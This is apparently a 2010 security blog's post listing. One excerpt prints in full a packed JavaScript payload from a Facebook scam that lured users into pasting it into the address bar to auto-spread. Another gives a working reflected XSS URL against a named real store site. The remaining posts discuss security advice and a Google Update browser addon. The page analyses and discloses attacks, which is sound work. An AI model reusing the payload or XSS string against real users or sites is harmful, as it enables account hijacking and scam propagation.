Facebook social engineering XSS
Posted by scriptjunkie in webapps on May 11, 2010
Found in the wild (http://www.facebook.com/pages/Teacher-asked-Why-do-Boys-Walk-faster-then-Girls-Girls-Talk-more-then-Boys/125748790772279) attempts to trick users by instructing them to type CTRL+C, to copy hidden javascript, then Alt+D to highlight the address bar to paste and run this javascript: javascript:(function(){a=’app121760014508794_iji’;b=’app121760014508794_aja’;rew=’app121760014508794_rew’;qwe=’app121760014508794_qwe’;qtt=’app121760014508794_qtt’;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘P e=[“\p\g\l\g\I\g\k\g\h\D”,”\l\h\D\k\f”,”\o\f\h\v\k\f\q\f\j\h\J\D\Q\x”,”\y\g\x\x\f\j”,”\g\j\j\f\z\R\K\L\S”,”\p\n\k\A\f”,”\l\A\o\o\f\l\h”,”\k\g\G\f\q\f”,”\l\k\g\j\G”,”\L\r\A\l\f\v\p\f\j\h\l”,”\t\z\f\n\h\f\v\p\f\j\h”,”\t\k\g\t\G”,”\g\j\g\h\v\p\f\j\h”,”\x\g\l\u\n\h\t\y\v\p\f\j\h”,”\l\f\k\f\t\h\w\n\k\k”,”\l\o\q\w\g\j\p\g\h\f\w\T\r\z\q”,”\H\n\U\n\V\H\l\r\t\g\n\k\w\o\z\n\u\y\H\g\j\p\g\h\f\w\x\g\n\k\r\o\W\u\y\u”,”\l\A\I\q\g\h\X\g\n\k\r\o”,”\g\j\u\A\h”,”\o\f\h\v\k\f\q\f\j\h\l\J\D\K\n\o\Y\n\q\f”,”\Z\y\n\z\f”,”\u\r\u\w\t\r\j\h\f\j\h”];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);’,62,85,’||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||qtt|fs|SocialGraphManager|for|in|if|20|qwe|rew|21|2000|4000|3000′.split(‘|’),0,{}))})(); ______________________________________ Looks like the “Dean Edwards packing tool” And according to http://www.strictly-software.com/unpacker here is the unpacked […]
XSS, no really
Posted by scriptjunkie in /dev/urandom, Exploits, webapps on April 15, 2010
XSS tends to get the eyeroll treatment from security pros since a) it’s everywhere. 2 min of looking for an example on the GOP website, and tada: http://www.gopstore.com/cgi-bin/rnc/scan/st=db/co=yes/sf=prod_group/se=stick%3Cimg%20src=0%20onerror=%22alert%281%29%22%20%3Eer/op=eq/tf=description/ml=12/sp=1stickers.html b) your 8-year-old kid can find it after about 2 minutes of instruction c) it doesn’t give you a shell (directly) But it still works. And it […]
Security advice
Posted by scriptjunkie in /dev/urandom on March 21, 2010
Great post from rsnake; pointing out a Microsoft Research paper (So Long, And No Thanks for the Externalities: The Rational Rejection of Security Advice by Users ) on how security advice often does more harm than good. http://ha.ckers.org/blog/20100317/effectiveness-of-user-training-and-security-products-in-general/ I have always disagreed with password policies. There is no gain to most strict password policies over […]
Google Update
Posted by scriptjunkie in /dev/urandom on March 6, 2010
If you have installed Google Chrome, or maybe Google Desktop or Google’s toolbar, you might be surprised that you have a new Firefox addon, named “Google Update”. And just like Microsoft’s loveable addon, the Google Update addon opens a hole you probably don’t want opened. Unable to find much documentation on the addon, I did […]